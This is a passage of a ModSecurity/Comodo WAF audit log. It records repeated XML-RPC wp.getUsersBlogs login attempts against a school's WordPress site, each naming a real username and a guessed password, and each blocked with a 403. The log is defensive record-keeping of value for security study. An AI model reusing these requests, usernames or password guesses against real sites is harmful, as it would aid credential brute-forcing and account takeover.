103.236.140.4 8181 --c6b34b00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c6b34b00-C-- wp.getUsersBlogs wakasarpras diamond --c6b34b00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6b34b00-E-- --c6b34b00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075072654731 5532 (- - -) Stopwatch2: 1745075072654731 5532; combined=4044, p1=551, p2=3311, p3=0, p4=0, p5=107, sr=85, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6b34b00-Z-- --f9db2020-A-- [19/Apr/2025:22:05:32 +0700] aAO7vOvDiFC_ir7MDwYqwAAAAEQ 103.236.140.4 37736 103.236.140.4 8181 --f9db2020-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f9db2020-C-- wp.getUsersBlogs wakasarpras loveyou --f9db2020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9db2020-E-- --f9db2020-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075132082503 5155 (- - -) Stopwatch2: 1745075132082503 5155; combined=3502, p1=427, p2=2918, p3=0, p4=0, p5=94, sr=81, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9db2020-Z-- --e45a6718-A-- [19/Apr/2025:22:06:40 +0700] aAO8AEruoUXZj665VUFHHQAAANY 103.236.140.4 43946 103.236.140.4 8181 --e45a6718-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e45a6718-C-- wp.getUsersBlogs wakasarpras 123456b --e45a6718-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e45a6718-E-- --e45a6718-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075200140562 4546 (- - -) Stopwatch2: 1745075200140562 4546; combined=3249, p1=397, p2=2696, p3=0, p4=0, p5=91, sr=76, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e45a6718-Z-- --8e87cd60-A-- [19/Apr/2025:22:07:41 +0700] aAO8PXNa4dA2HllpK_PCLgAAAIE 103.236.140.4 49578 103.236.140.4 8181 --8e87cd60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8e87cd60-C-- wp.getUsersBlogs kasubagtu kasubagtukasubagtu --8e87cd60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e87cd60-E-- --8e87cd60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075261267700 4807 (- - -) Stopwatch2: 1745075261267700 4807; combined=3607, p1=448, p2=2930, p3=0, p4=0, p5=134, sr=85, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e87cd60-Z-- --38ce4545-A-- [19/Apr/2025:22:08:41 +0700] aAO8eQ6cTFSgLAHl7PolpwAAABM 103.236.140.4 55002 103.236.140.4 8181 --38ce4545-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --38ce4545-C-- wp.getUsersBlogs kasubagtu 123123123 --38ce4545-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38ce4545-E-- --38ce4545-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075321534088 4147 (- - -) Stopwatch2: 1745075321534088 4147; combined=3006, p1=375, p2=2484, p3=0, p4=0, p5=87, sr=72, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38ce4545-Z-- --6600626d-A-- [19/Apr/2025:22:09:51 +0700] aAO8v3Na4dA2HllpK_PE5gAAAI8 103.236.140.4 33654 103.236.140.4 8181 --6600626d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6600626d-C-- wp.getUsersBlogs kasubagtu kasubagtu1991 --6600626d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6600626d-E-- --6600626d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075391312586 5393 (- - -) Stopwatch2: 1745075391312586 5393; combined=4181, p1=534, p2=3425, p3=0, p4=0, p5=129, sr=95, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6600626d-Z-- --75348654-A-- [19/Apr/2025:22:10:54 +0700] aAO8_nNa4dA2HllpK_PGeAAAAI8 103.236.140.4 39982 103.236.140.4 8181 --75348654-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --75348654-C-- wp.getUsersBlogs kasubagtu trustno1 --75348654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75348654-E-- --75348654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075454895108 4974 (- - -) Stopwatch2: 1745075454895108 4974; combined=3540, p1=472, p2=2907, p3=0, p4=0, p5=96, sr=104, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75348654-Z-- --2081d256-A-- [19/Apr/2025:22:11:56 +0700] aAO9POvDiFC_ir7MDwYydgAAAE0 103.236.140.4 45944 103.236.140.4 8181 --2081d256-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2081d256-C-- wp.getUsersBlogs kasubagtu kasubagtu1989 --2081d256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2081d256-E-- --2081d256-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075516259482 5232 (- - -) Stopwatch2: 1745075516259482 5232; combined=3905, p1=449, p2=3252, p3=0, p4=0, p5=119, sr=85, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2081d256-Z-- --7fa3ee2b-A-- [19/Apr/2025:22:13:02 +0700] aAO9fuvDiFC_ir7MDwYz_wAAAEc 103.236.140.4 52466 103.236.140.4 8181 --7fa3ee2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7fa3ee2b-C-- wp.getUsersBlogs kasubagtu marketing --7fa3ee2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fa3ee2b-E-- --7fa3ee2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075582245959 5530 (- - -) Stopwatch2: 1745075582245959 5530; combined=4174, p1=404, p2=3562, p3=0, p4=0, p5=121, sr=81, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fa3ee2b-Z-- --8a461b7a-A-- [19/Apr/2025:22:14:12 +0700] aAO9xOvDiFC_ir7MDwY1twAAAFQ 103.236.140.4 59410 103.236.140.4 8181 --8a461b7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8a461b7a-C-- wp.getUsersBlogs kasubagtu martin --8a461b7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a461b7a-E-- --8a461b7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075652899142 5366 (- - -) Stopwatch2: 1745075652899142 5366; combined=3752, p1=469, p2=3105, p3=0, p4=0, p5=104, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a461b7a-Z-- --48812e3d-A-- [19/Apr/2025:22:15:14 +0700] aAO-AuvDiFC_ir7MDwY3vAAAAEo 103.236.140.4 37294 103.236.140.4 8181 --48812e3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --48812e3d-C-- wp.getUsersBlogs kasubagtu jessica1 --48812e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48812e3d-E-- --48812e3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (54+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075714292365 5021 (- - -) Stopwatch2: 1745075714292365 5021; combined=3577, p1=448, p2=2910, p3=0, p4=0, p5=127, sr=98, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48812e3d-Z-- --ad457b64-A-- [19/Apr/2025:22:16:19 +0700] aAO-Q3Na4dA2HllpK_PNNAAAAJY 103.236.140.4 43840 103.236.140.4 8181 --ad457b64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ad457b64-C-- wp.getUsersBlogs kasubagtu 741852963 --ad457b64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad457b64-E-- --ad457b64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075779610754 4366 (- - -) Stopwatch2: 1745075779610754 4366; combined=3132, p1=363, p2=2571, p3=0, p4=0, p5=114, sr=65, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad457b64-Z-- --a3c80635-A-- [19/Apr/2025:22:17:19 +0700] aAO-f0ruoUXZj665VUFXwgAAAMo 103.236.140.4 49978 103.236.140.4 8181 --a3c80635-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a3c80635-C-- wp.getUsersBlogs kasubagtu marketing2022_ --a3c80635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c80635-E-- --a3c80635-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075839877656 5298 (- - -) Stopwatch2: 1745075839877656 5298; combined=3918, p1=450, p2=3282, p3=0, p4=0, p5=109, sr=89, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c80635-Z-- --2289073a-A-- [19/Apr/2025:22:18:19 +0700] aAO-u0ruoUXZj665VUFYhQAAAMk 103.236.140.4 53962 103.236.140.4 8181 --2289073a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2289073a-C-- wp.getUsersBlogs kasubagtu marketing2023 --2289073a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2289073a-E-- --2289073a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075899507219 5039 (- - -) Stopwatch2: 1745075899507219 5039; combined=3450, p1=418, p2=2868, p3=0, p4=0, p5=95, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2289073a-Z-- --ba473e4c-A-- [19/Apr/2025:22:19:22 +0700] aAO--nNa4dA2HllpK_PRkgAAAJQ 103.236.140.4 57984 103.236.140.4 8181 --ba473e4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ba473e4c-C-- wp.getUsersBlogs kasubagtu united --ba473e4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba473e4c-E-- --ba473e4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075962132505 4991 (- - -) Stopwatch2: 1745075962132505 4991; combined=3594, p1=456, p2=2921, p3=0, p4=0, p5=128, sr=96, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba473e4c-Z-- --72189a2f-A-- [19/Apr/2025:22:20:22 +0700] aAO_NkruoUXZj665VUFaqwAAAMI 103.236.140.4 33308 103.236.140.4 8181 --72189a2f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 235 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --72189a2f-C-- wp.getUsersBlogs kasubagtu smkn22-jkt_sch_id000 --72189a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72189a2f-E-- --72189a2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076022007631 3636 (- - -) Stopwatch2: 1745076022007631 3636; combined=2459, p1=316, 